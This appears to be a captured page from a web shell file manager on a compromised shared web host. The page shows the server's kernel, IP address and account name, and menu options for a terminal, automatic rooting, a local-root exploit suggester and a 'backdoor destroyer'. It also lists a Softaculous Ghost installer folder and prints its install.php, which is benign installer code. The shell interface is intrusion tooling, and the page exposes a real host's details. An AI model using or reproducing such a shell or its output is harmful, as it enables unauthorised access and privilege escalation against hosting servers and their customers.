Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.154
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
ghost /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2017-07-04 10:24
node
[ DIR ]
drwxr-xr-x
2017-07-04 10:24
php53
[ DIR ]
drwxr-xr-x
2017-07-04 10:24
php56
[ DIR ]
drwxr-xr-x
2017-07-04 10:24
.htaccess
231
B
-rw-r--r--
2016-06-07 10:12
_import.php
1.78
KB
-rw-r--r--
2013-11-30 13:01
config.js
4.51
KB
-rw-r--r--
2016-10-14 10:24
cron.php
413
B
-rw-r--r--
2014-01-17 13:42
edit.php
11.66
KB
-rw-r--r--
2017-06-19 11:37
edit.xml
512
B
-rw-r--r--
2014-03-20 10:30
fileindex.php
170
B
-rw-r--r--
2015-04-14 10:14
info.xml
2.29
KB
-rw-r--r--
2017-06-19 11:24
install.js
921
B
-rw-r--r--
2013-11-29 09:39
install.php
13.65
KB
-rw-r--r--
2017-06-19 11:37
install.xml
508
B
-rw-r--r--
2014-02-21 09:56
install_ghost.php
2.78
KB
-rw-r--r--
2013-11-30 14:06
md5
3.34
KB
-rw-r--r--
2017-06-19 11:37
notes.txt
452
B
-rw-r--r--
2017-04-19 10:31
npm-shrinkwrap.json
121.39
KB
-rw-r--r--
2017-06-19 11:24
package.json
2.99
KB
-rw-r--r--
2017-06-19 11:24
remove.php
1.89
KB
-rw-r--r--
2013-11-29 14:55
upgrade.php
10.52
KB
-rw-r--r--
2017-06-19 11:37
upgrade.xml
342
B
-rw-r--r--
2015-03-02 10:18
Save
Rename
<?php ////////////////////////////////////////////////////////////// //=========================================================== // install.php(For individual softwares) //=========================================================== // SOFTACULOUS // Version : 1.0 // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Alons // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: http://www.softaculous.com/ (SOFTACULOUS) // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- //=========================================================== // (c)Softaculous Inc. //=========================================================== ////////////////////////////////////////////////////////////// ///////////////////////////////////////// // All functions in this PAGE must begin // with TWO UNDERSCORE '__' to avoid // clashes with SOFTACULOUS Functions // e.g. __funcname() ///////////////////////////////////////// //The Install process function __install(){ global $__settings, $error, $software, $globals, $softpanel, $notes; // Set Environment PATH for exec(); putenv('PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin'); // Delete your self @unlink(__FILE__); echo 'Started'; // Make a temporary folder $tmp = 'tmp'.rand(1000, 9999); @mkdir('[[nodedir]]/'.$tmp); @chmod('[[nodedir]]/'.$tmp, 0777); echo 'Created TMP Folder'; // Set the env putenv('TMPDIR=[[nodedir]]/'.$tmp); putenv('TMP=[[nodedir]]/'.$tmp); putenv('TEMP=[[nodedir]]/'.$tmp); echo 'Installing'; // Initiate the installer. Installing Node __do_exec('export HOME=[[nodedir]]; cd [[softpath]]; [[nodedir]]/bin/npm install --production 2>&1', 'Error installing node modules ! This generally happens due to less memory.'); // Were there any errors if(!empty($error)){ return false; } echo 'Installed'; // Start the Node service __do_exec('export HOME=[[nodedir]]; cd [[softpath]]; [[nodedir]]/bin/npm start --production > [[ghostlog]] 2>&1 &', 'Error starting ghost !'); // Were there any errors if(!empty($error)){ return false; } echo 'Started'; // Installed successfully file_put_contents('soft_ghost_install_success', 1); } // Execute exec(); Set $debug to 1 to print output function __do_exec($cmd, $errorStr, $debug = 0){ global $error; exec($cmd, $out, $ret); echo $cmd.'<br>'; print_r(array($ret, $out)); if(!empty($ret)){ $error[] = $errorStr; } // Store the error if(!empty($error)){ file_put_contents('soft_ghost_install_error', serialize($error)); } } // Delete your self @unlink(__FILE__); // Start the install __install(); ?>